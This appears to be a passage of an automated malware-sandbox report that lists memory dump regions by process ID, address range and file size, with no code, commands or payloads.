                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2188-192-0x0000000004C50000-0x0000000004C6E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2188-215-0x0000000004E40000-0x0000000004E41000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2188-185-0x0000000000450000-0x00000000004C6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    472KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2188-189-0x0000000004C90000-0x0000000004D06000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    472KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2188-208-0x0000000073420000-0x0000000073BD0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2188-197-0x0000000005400000-0x00000000059A4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3020-338-0x00000000031B0000-0x00000000031C0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3020-307-0x00000000031B0000-0x00000000031C0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3020-317-0x00000000031B0000-0x00000000031C0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3020-318-0x00000000031B0000-0x00000000031C0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3020-312-0x00000000031B0000-0x00000000031C0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3020-287-0x00000000031B0000-0x00000000031C0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3020-236-0x0000000003120000-0x0000000003135000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3020-296-0x00000000031B0000-0x00000000031C0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3020-302-0x00000000031B0000-0x00000000031C0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3120-198-0x00007FFC075F0000-0x00007FFC080B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3120-172-0x0000000000810000-0x000000000082E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3124-364-0x0000000000400000-0x0000000000631000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3156-372-0x0000000010000000-0x0000000010D56000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    13.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3624-214-0x0000000000400000-0x0000000002B6B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    39.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3624-178-0x0000000002D28000-0x0000000002D51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    164KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3624-212-0x0000000002D28000-0x0000000002D51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    164KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3624-213-0x0000000002CC0000-0x0000000002D08000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    288KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3888-179-0x0000000140000000-0x0000000140650000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    6.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3932-196-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    436KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3932-174-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    436KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4216-272-0x0000000000DD0000-0x0000000000E17000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    284KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4216-289-0x0000000071AE0000-0x0000000071B69000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    548KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4216-278-0x0000000000C80000-0x0000000000C81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4216-267-0x0000000000270000-0x00000000003DB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4216-277-0x0000000077940000-0x0000000077B55000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    2.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4216-321-0x000000006F450000-0x000000006F49C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4216-273-0x0000000000C60000-0x0000000000C61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4216-305-0x0000000076930000-0x0000000076EE3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4216-283-0x0000000000270000-0x00000000003DB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4216-269-0x0000000000270000-0x00000000003DB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4264-242-0x0000000003EC0000-0x000000000407E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    1.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4400-335-0x000000000057D000-0x00000000005CD000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    320KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4696-230-0x0000000005830000-0x0000000005842000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    72KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4696-227-0x0000000073420000-0x0000000073BD0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4696-233-0x00000000058A0000-0x00000000058DC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    240KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4696-222-0x0000000000400000-0x0000000000422000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    136KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4696-237-0x0000000005690000-0x0000000005CA8000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4696-226-0x0000000005CB0000-0x00000000062C8000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4696-231-0x0000000005960000-0x0000000005A6A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4828-271-0x00000000006E8000-0x000000000070F000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    156KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4892-366-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4892-368-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4892-365-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-282-0x0000000002290000-0x0000000002291000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-309-0x0000000076930000-0x0000000076EE3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-323-0x000000006F450000-0x000000006F49C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-300-0x0000000071AE0000-0x0000000071B69000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    548KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-275-0x00000000022B0000-0x00000000022F7000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    284KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-291-0x0000000077940000-0x0000000077B55000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    2.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-280-0x0000000000650000-0x00000000007BD000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5068-314-0x0000000076930000-0x0000000076EE3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5068-330-0x000000006F450000-0x000000006F49C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5068-303-0x0000000071AE0000-0x0000000071B69000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    548KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5068-293-0x0000000077940000-0x0000000077B55000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    2.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5068-288-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5068-276-0x0000000002940000-0x0000000002986000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                    280KB